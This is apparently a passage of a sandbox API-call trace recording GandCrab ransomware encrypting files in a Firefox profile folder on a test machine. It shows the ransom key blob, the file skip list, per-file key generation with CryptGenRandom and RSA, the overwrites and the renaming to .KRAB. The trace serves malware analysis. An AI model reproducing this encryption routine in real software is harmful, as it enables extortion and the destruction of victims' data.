qeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.660] WriteFile (in: hFile=0x72c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0083.662] CloseHandle (hObject=0x72c) returned 1 [0083.662] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.665] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.665] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1e, wMilliseconds=0x367)) [0083.665] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.669] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.669] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.669] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock") returned 128 [0083.669] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x72c [0083.675] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.675] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.682] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\") returned 105 [0083.682] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*" [0083.682] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0x1022ff8 [0083.682] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.682] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.683] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.683] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.683] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.683] lstrcmpW (lpString1=".metadata", lpString2=".") returned 1 [0083.683] lstrcmpW (lpString1=".metadata", lpString2="..") returned 1 [0083.683] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2=".metadata" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata" [0083.683] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.683] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata.KRAB") returned 119 [0083.683] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0083.683] lstrlenW (lpString=".metadata") returned 9 [0083.683] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.684] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".metadata ") returned 10 [0083.684] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.684] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0083.684] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="desktop.ini") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="autorun.inf") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="iconcache.db") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="bootsect.bak") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="boot.ini") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat.log") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="thumbs.db") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.html") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.txt") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="CRAB-DECRYPT.txt") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="ntldr") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="NTDETECT.COM") returned -1 [0083.685] lstrcmpiW (lpString1=".metadata", lpString2="Bootfont.bin") returned -1 [0083.686] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.706] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10114e0) returned 1 [0083.708] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.708] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.709] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.709] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0083.709] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0083.709] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.713] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011898) returned 1 [0083.715] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0083.715] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.716] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.716] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0083.716] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0083.716] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.716] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10113d0) returned 1 [0083.719] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023338) returned 1 [0083.720] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0083.720] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0083.720] GetLastError () returned 0x0 [0083.720] CryptDestroyKey (hKey=0x1023338) returned 1 [0083.720] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0083.720] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10114e0) returned 1 [0083.722] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023238) returned 1 [0083.722] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0083.722] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0083.722] GetLastError () returned 0x0 [0083.722] CryptDestroyKey (hKey=0x1023238) returned 1 [0083.722] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0083.722] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7dc [0083.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.730] ReadFile (in: hFile=0x7dc, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1d, lpOverlapped=0x0) returned 1 [0083.745] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.745] WriteFile (in: hFile=0x7dc, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1d, lpOverlapped=0x0) returned 1 [0083.745] WriteFile (in: hFile=0x7dc, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0083.745] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.749] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.750] CloseHandle (hObject=0x7dc) returned 1 [0083.750] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.750] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata.krab")) returned 1 [0083.751] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.751] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.751] lstrcmpW (lpString1=".metadata-v2", lpString2=".") returned 1 [0083.751] lstrcmpW (lpString1=".metadata-v2", lpString2="..") returned 1 [0083.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2=".metadata-v2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2" [0083.751] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.752] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2.KRAB") returned 122 [0083.752] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0083.752] lstrlenW (lpString=".metadata-v2") returned 12 [0083.752] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.752] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".metadata-v2 ") returned 13 [0083.752] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.753] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0083.753] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="desktop.ini") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="autorun.inf") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="iconcache.db") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootsect.bak") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot.ini") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat.log") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="thumbs.db") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.html") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.txt") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="CRAB-DECRYPT.txt") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntldr") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTDETECT.COM") returned -1 [0083.753] lstrcmpiW (lpString1=".metadata-v2", lpString2="Bootfont.bin") returned -1 [0083.753] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.754] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011678) returned 1 [0083.755] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.756] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.756] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.756] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0083.756] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0083.756] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.756] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10108a8) returned 1 [0083.758] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.758] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.759] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.759] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0083.759] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0083.759] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.762] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010b50) returned 1 [0083.763] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023278) returned 1 [0083.763] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0083.763] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0083.764] GetLastError () returned 0x0 [0083.764] CryptDestroyKey (hKey=0x1023278) returned 1 [0083.764] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0083.764] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010a40) returned 1 [0083.765] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023338) returned 1 [0083.767] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0083.767] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0083.768] GetLastError () returned 0x0 [0083.768] CryptDestroyKey (hKey=0x1023338) returned 1 [0083.768] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0083.768] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7dc [0083.768] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.769] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.770] ReadFile (in: hFile=0x7dc, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x2a, lpOverlapped=0x0) returned 1 [0083.783] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xffffffd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.783] WriteFile (in: hFile=0x7dc, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x2a, lpOverlapped=0x0) returned 1 [0083.783] WriteFile (in: hFile=0x7dc, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0083.783] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.787] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.788] CloseHandle (hObject=0x7dc) returned 1 [0083.788] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.788] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2.krab")) returned 1 [0083.789] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.790] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.790] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0083.790] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0083.790] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock" [0083.790] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 